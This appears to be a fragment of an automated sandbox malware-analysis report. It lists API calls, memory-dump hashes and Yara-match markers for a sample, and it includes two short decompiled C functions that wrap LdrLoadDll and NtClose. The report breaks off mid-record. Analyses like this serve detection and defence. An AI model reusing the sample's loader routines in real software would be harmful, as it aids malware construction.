
                                          APIs
                                          • LoadLibraryA.KERNELBASE(?), ref: 0B4E2032
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: fbd5379bd98c0bb9f9af1562aac9b5c3717acb068076c9768cd45fc6b222cc53
                                          • Instruction ID: a2e684aaa52ceb6ceef8f353971a04d64a8059ab1462805cffb9974b71370ede
                                          • Opcode Fuzzy Hash: fbd5379bd98c0bb9f9af1562aac9b5c3717acb068076c9768cd45fc6b222cc53
                                          • Instruction Fuzzy Hash: 4F3148B0D002599FDB14CFA9C4857DEBBB5BB08314F14812AE825AB380D7B89945CFA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNELBASE(?), ref: 0B4E2032
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: b9fa017fd7bc961eddc41149cf8e2da70b1d6313d4d3b4a5e95ab17e866d8be5
                                          • Instruction ID: 6990fc061c62a45e7bfd091407ebf3c8e0775cf8aee1f8e8b9f81ee5f1c56316
                                          • Opcode Fuzzy Hash: b9fa017fd7bc961eddc41149cf8e2da70b1d6313d4d3b4a5e95ab17e866d8be5
                                          • Instruction Fuzzy Hash: E53148B0D00259DFDB14CFA9C48579EBBF5BB08314F14812AE825BB380D7B89945CFA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 8d28f836b295f576ec6c041dbcf8403846d3f6eb75085b7ed545517606ffe553
                                          • Instruction ID: 7e147f89846a104d1f764a52710b2d06796c40d49c5e18e81ca1d53263f25c57
                                          • Opcode Fuzzy Hash: 8d28f836b295f576ec6c041dbcf8403846d3f6eb75085b7ed545517606ffe553
                                          • Instruction Fuzzy Hash: F921D2B5901248AFDB10CFAAD584BDEBBF4EB48324F14845AE914A7210D374A955CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0d13de48753f5a9ed061033cb8a3a14445fd069c61eccdac4a68c6bf107cd1b6
                                          • Instruction ID: 5f86abf66899625bff3d9f68a59b06115f45ccfa19e7da3ddec5ccbd3d37a451
                                          • Opcode Fuzzy Hash: 0d13de48753f5a9ed061033cb8a3a14445fd069c61eccdac4a68c6bf107cd1b6
                                          • Instruction Fuzzy Hash: 1321E4B5901248AFDB10CFAAD584BDEBBF8FB48320F14845AE914A3310D374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 933b9918aa2939033217d356047911d115938cad07e6b372168e39e4db5e9f36
                                          • Instruction ID: b774a9d9bd1acbf10f670b38812cc2c546a2093746f492c4108bb95f5d3efdd9
                                          • Opcode Fuzzy Hash: 933b9918aa2939033217d356047911d115938cad07e6b372168e39e4db5e9f36
                                          • Instruction Fuzzy Hash: 551103B6900309DFDB10CF9AD444BDEFBF5EB88324F14846AE915A7240C375A949CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: eab27e685f74bbbb5a5af07df4419e4f9da5cea878b06c654a966ca40da83def
                                          • Instruction ID: 427951c768b528ff202cc1ff674bcc472bfa0de3557f816e4910bde85f461d32
                                          • Opcode Fuzzy Hash: eab27e685f74bbbb5a5af07df4419e4f9da5cea878b06c654a966ca40da83def
                                          • Instruction Fuzzy Hash: 1F1130B6800309CFDB10CF9AC484BDEFBF1EB48324F14846AD919A7200C378A949CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B4EAC05
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: cb69903b814714df4dcb68bca1c2e5e0519932a65f3d93053dfbd4c852e5ac8a
                                          • Instruction ID: e0c966ee81e406e94d9a5ab8fede2ce4e1ecea1266646605932b60e3c99a514f
                                          • Opcode Fuzzy Hash: cb69903b814714df4dcb68bca1c2e5e0519932a65f3d93053dfbd4c852e5ac8a
                                          • Instruction Fuzzy Hash: 7B11D6B58002499FDB10CF9AD885BDFFBF8EB88324F14841AE555A7610D374A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: ea1779bfcf2d602df73254cba3abbe1c2db70af5616477d578d40010d72fc3a1
                                          • Instruction ID: e0655564ae41dd0e49abc45efb483d1db2b7d120c8fc944d422f0478c2d5d156
                                          • Opcode Fuzzy Hash: ea1779bfcf2d602df73254cba3abbe1c2db70af5616477d578d40010d72fc3a1
                                          • Instruction Fuzzy Hash: 4611DFB6C006498FDB10CF9AC444BDEFBF5EB88324F14846AD959A7600D378A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0B4EC790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: c19527f4f5bab1294e72d2e3c4b4d05dd18783ff67c18d1a015c4b507d03c23c
                                          • Instruction ID: c9e1d2fba804054351b9c9a1b1b8f6be64d06097fbbcee372f34dafe82c13c96
                                          • Opcode Fuzzy Hash: c19527f4f5bab1294e72d2e3c4b4d05dd18783ff67c18d1a015c4b507d03c23c
                                          • Instruction Fuzzy Hash: 4B1145B58002498FDB10CF9AC484BDEBBF4EF48320F14842AD9A8B7340D738A644CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0B4EC790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 7a19a071174a5303d0c5598f5519febdbd886c309314e2c7fae41df5035388a5
                                          • Instruction ID: 5d3c4472b5491cade3eec9a6e6fde0f08d052307ca87789dfc14b63341f21e0a
                                          • Opcode Fuzzy Hash: 7a19a071174a5303d0c5598f5519febdbd886c309314e2c7fae41df5035388a5
                                          • Instruction Fuzzy Hash: 871122B68002498FDB10CF99C584BDEBBF4EB48324F15842AD5A9B7240D738AA44CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B4EAC05
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 95cc5e3c560ccb1b7a5e144b3f679aa0430457db5dbcffb51907fbad634bd5c6
                                          • Instruction ID: 2d209ab3df7296e0312d8439a17518a0dc482d3debc074b725277bd169e07131
                                          • Opcode Fuzzy Hash: 95cc5e3c560ccb1b7a5e144b3f679aa0430457db5dbcffb51907fbad634bd5c6
                                          • Instruction Fuzzy Hash: 4B11F2B59002499FDB10CF9AC488BDFBBF8EB48324F10841AE965A7610C374A984CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: aa94ef80438b894895b5685cd006a946f3136156e6e92a21b9753d3ae731b6a4
                                          • Instruction ID: ff89fe7992f95ba91997f7531b2b7163c9c8ed297f3601feadab65e23c264afc
                                          • Opcode Fuzzy Hash: aa94ef80438b894895b5685cd006a946f3136156e6e92a21b9753d3ae731b6a4
                                          • Instruction Fuzzy Hash: FA11E0B6D006498FDB10CF9AD444BDEFBF5EB88324F14846AC959A7610C378A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: 1d21235265986f76c0d1dad58b2ef7ff16f1081d78aae227c10397b47ad7a7bd
                                          • Instruction ID: d89c1b159a2ab68da9beeda7e78790690d94d6b6c2046cdf93bcc0cf5eaa2a94
                                          • Opcode Fuzzy Hash: 1d21235265986f76c0d1dad58b2ef7ff16f1081d78aae227c10397b47ad7a7bd
                                          • Instruction Fuzzy Hash: 7A11D0B58002499FDB20CF9AD484BDEBBF8EB88324F14855AE959A7600C374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: e08cde13bde1bb181d37da7049730ffa20f50bcdc8b055fd923de884236811dd
                                          • Instruction ID: 0984fc374ea34dde74d294056017bd0d1924a523119cf2fb542a26ad16d50a1c
                                          • Opcode Fuzzy Hash: e08cde13bde1bb181d37da7049730ffa20f50bcdc8b055fd923de884236811dd
                                          • Instruction Fuzzy Hash: 1C1112B5900349DFDB20CF99D584BDEBBF8EB88320F14855AD959A3740C374AA44CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba7f77ae2d2020628a5dd4a6e53b02ed3bf9b23ef1b01f2a05f687e797df2d76
                                          • Instruction ID: c893e86d6619eeaf96d0a1504b00d4ce74a4ec48c0226e8999202a2331763201
                                          • Opcode Fuzzy Hash: ba7f77ae2d2020628a5dd4a6e53b02ed3bf9b23ef1b01f2a05f687e797df2d76
                                          • Instruction Fuzzy Hash: 2F2129B1504384DFDB06CF14D9C0B26BF69FB98328F248669F9054B25AC73ADC56CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653392079.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aba1d6872009fdebab3470ddde5608e44a38a3c8fbee440e47e04709042d8e2c
                                          • Instruction ID: 48447f9fd93973f9471359513294c59e76b4b74423703bd7fc440ba7521344f9
                                          • Opcode Fuzzy Hash: aba1d6872009fdebab3470ddde5608e44a38a3c8fbee440e47e04709042d8e2c
                                          • Instruction Fuzzy Hash: 3D213771504248EFDB16CF50D4C0B26FB66FB84314F24CA69EA4A4B246CB36D807CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653392079.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88cd9dc9522f8d980937c37bb1201ebc52fc3f73170c4f8df23b0a354b172f02
                                          • Instruction ID: 268604e2995227f921028af511d0637b306c5ed6b90f07f45d44ed6ac55b4568
                                          • Opcode Fuzzy Hash: 88cd9dc9522f8d980937c37bb1201ebc52fc3f73170c4f8df23b0a354b172f02
                                          • Instruction Fuzzy Hash: 8C2180755093C48FDB03CF20D994715BF71EB46314F28C5EAD8498B657C33A980ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                          • Instruction ID: 56d05f7beb8667f4ccdfecc37686e5c87655c3656af5cec4800b4823c16bcd01
                                          • Opcode Fuzzy Hash: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                          • Instruction Fuzzy Hash: C111E676404280DFDF12CF10D9C4B16BF71FB94324F24C6A9E8050B61AC33AD856CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b2f5b0e0e09d7f57d89cb8f3bd0f535f506af7fe9287101acfd2432d4ca38e3
                                          • Instruction ID: f7dec48d9d2793be327d2ee4c65af63265330de49022a3bb30753853f4cd48b3
                                          • Opcode Fuzzy Hash: 4b2f5b0e0e09d7f57d89cb8f3bd0f535f506af7fe9287101acfd2432d4ca38e3
                                          • Instruction Fuzzy Hash: 5D01F7B100A3C4AAE7118B17CC80B66BB9CEF41764F18C55AED095B286C37A9C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b96debff970fc5aa38d01900921025505f97df078b815fe75a41f51337df064
                                          • Instruction ID: 137e00c1bb21109ee4a066d5247eb627e20bfd2903cb37f9610de6317b419a88
                                          • Opcode Fuzzy Hash: 9b96debff970fc5aa38d01900921025505f97df078b815fe75a41f51337df064
                                          • Instruction Fuzzy Hash: E6F062B1405288AFE7118B16DCC4B62FBACEF91774F18C45AED085B686C3799C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 9*J@$^v
                                          • API String ID: 0-2667801510
                                          • Opcode ID: 4f3e83b3694c89adc95ccab447f2d766c9d32946d1c35670b3af4f362b4e1fce
                                          • Instruction ID: 02a3d2c9f2d39980e6e54325f7dbbd5dadea10caf22c6802d16e20630800659f
                                          • Opcode Fuzzy Hash: 4f3e83b3694c89adc95ccab447f2d766c9d32946d1c35670b3af4f362b4e1fce
                                          • Instruction Fuzzy Hash: 8DA1E174E0520A8F9F44CFA9D5804EEFBF2EF89300F24942AD425BB254D7359A428FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: ^v
                                          • API String ID: 0-4076843895
                                          • Opcode ID: b010f8d6e05fdb12cf97587333c2b24795bd08655e31311daace9decda1eef95
                                          • Instruction ID: 3ee17ed8bbba44df033008b27d47e5b5f67f3cccdb6f145988508eb6743c3090
                                          • Opcode Fuzzy Hash: b010f8d6e05fdb12cf97587333c2b24795bd08655e31311daace9decda1eef95
                                          • Instruction Fuzzy Hash: 7F91E174E052098FDF44CFA9D5805EEFBF2EF89300F24942AD425BB254D7359A428FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6486c9f6187728ac875218e8c17b7e44b6881a3515747ab9e288926a6075650e
                                          • Instruction ID: 417ffb92add46cd0da9f76d59e61551cac38e55eda0a8f3007ce7607204ebf2d
                                          • Opcode Fuzzy Hash: 6486c9f6187728ac875218e8c17b7e44b6881a3515747ab9e288926a6075650e
                                          • Instruction Fuzzy Hash: C8527BB1502F26CFD720CF14ECE8699BBB1FB40319B91435AC5615F6A0EBB8658ACF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e846c476d2796c9873b04ea970585391d930a31f2605c0c3a708d214ac956b0
                                          • Instruction ID: 16746360b827a4074f8aebecf29c1d15aeb16ee328a2cf20cbe846bc2eb3e6a5
                                          • Opcode Fuzzy Hash: 7e846c476d2796c9873b04ea970585391d930a31f2605c0c3a708d214ac956b0
                                          • Instruction Fuzzy Hash: 34A15032E00619CFCF15DFA5C844ADDBBF2FF85301B1585AAE905BB221EB35A949CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51f756829a700ce798e99a299943b97d8491452fdc65c6c4db90d35c9f691749
                                          • Instruction ID: ecb4d1454be14ca826c80412bf2b3afab9b3e5818a349ae312f271a505f4a114
                                          • Opcode Fuzzy Hash: 51f756829a700ce798e99a299943b97d8491452fdc65c6c4db90d35c9f691749
                                          • Instruction Fuzzy Hash: D2917070E002199FDF10CFA9C9917EEBBF2AF88315F14812AE425A7354DB749945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c9f2d723eef13c7bdb2aab64304a82c46e07eead82a292b1079ed5df2164634
                                          • Instruction ID: 711d91fdd81053769ba91a0b0a7d9a951f40a4cd455a7579b8586286f4cb5c04
                                          • Opcode Fuzzy Hash: 3c9f2d723eef13c7bdb2aab64304a82c46e07eead82a292b1079ed5df2164634
                                          • Instruction Fuzzy Hash: EB613871E04619CBDB28CF66C8447AEF7B6BFC9301F14D5AAC42DA7254EB345A858F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56bdebe09e06b8ec07081e2e6e581c97c4a5fb06e63b2872d58a3a57143589e0
                                          • Instruction ID: fbbf3130ed50dad55d5d70b5cbae9477ff7a1f7062252d8e5f30b1a9135c6ab5
                                          • Opcode Fuzzy Hash: 56bdebe09e06b8ec07081e2e6e581c97c4a5fb06e63b2872d58a3a57143589e0
                                          • Instruction Fuzzy Hash: 8D5128B1E006298BDB28CF66D9447AEF7B2BFC9301F14C5AAC419A7214EB345A858F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 388e4a1f24129a1022429d206a833ede286674f748508c9c77ea1fdb7b6b2fba
                                          • Instruction ID: e84ccc35a29fd84750f372681638b241193027cfc8d9a24d92403d763fe49dc4
                                          • Opcode Fuzzy Hash: 388e4a1f24129a1022429d206a833ede286674f748508c9c77ea1fdb7b6b2fba
                                          • Instruction Fuzzy Hash: 02513671E0062ACBDB64CF65D984BEDF7B2BF89301F10D6E6D41AA7600E7349A858F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d346fe01596465a05c81502c2bb4179fadab55265d46b2bd5c0252e252baa848
                                          • Instruction ID: 0552ac2554f6e4bb7ef65a8f6768e4015027bfea53abb37724237600b5722196
                                          • Opcode Fuzzy Hash: d346fe01596465a05c81502c2bb4179fadab55265d46b2bd5c0252e252baa848
                                          • Instruction Fuzzy Hash: 87414A70D0061ACBDB24CF51D980BEDF7B2BB89301F1096E6D51AB7600E7749AC58F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: 1602d10d5101f98693d435c84c5cfb66a4b2adc4893b173d21e0c6d2e8c925fd
                                          • Instruction ID: f1f2dead1fad3e74dad8768281147501293739708fdb763128d3229441b3bfc5
                                          • Opcode Fuzzy Hash: 1602d10d5101f98693d435c84c5cfb66a4b2adc4893b173d21e0c6d2e8c925fd
                                          • Instruction Fuzzy Hash: 5A2106B2200108AFCB18DF99DC91EEB77ADEF8C354F158249FA1DA7241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: wKA
                                          • API String ID: 823142352-3165208591
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041C640( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041CA60(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041CCE0( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041AE90(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}













                                          0x0040acdc
                                          0x0040acdf
                                          0x0040ace4
                                          0x0040ace9
                                          0x0040acf3
                                          0x0040acf8
                                          0x0040acfb
                                          0x0040acfd
                                          0x0040ad05
                                          0x0040ad0a
                                          0x0040ad0a
                                          0x0040ad11
                                          0x0040ad19
                                          0x0040ad1c
                                          0x0040ad1e
                                          0x0040ad32
                                          0x00000000
                                          0x0040ad34
                                          0x0040ad3a
                                          0x0040acee
                                          0x0040acee
                                          0x0040acee

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                          • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00419E7A(void* __ecx, intOrPtr _a4, void* _a8) {
                                          				long _t10;
                                          				void* _t14;
                                          				void* _t15;
                                          
                                          				asm("lock loopne 0x48");
                                          				_t7 = _a4;
                                          				_t4 = _t7 + 0x10; // 0x300
                                          				_t5 = _t7 + 0xc50; // 0x40a913
                                          				E0041A950(_t14, _a4, _t5,  *_t4, 0, 0x2c, _t15);
                                          				_t10 = NtClose(_a8); // executed
                                          				return _t10;
                                          			}






                                          0x00419e7d
                                          0x00419e83
                                          0x00419e86
                                          0x00419e8f
                                          0x00419e97
                                          0x00419ea5
                                          0x00419ea9

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
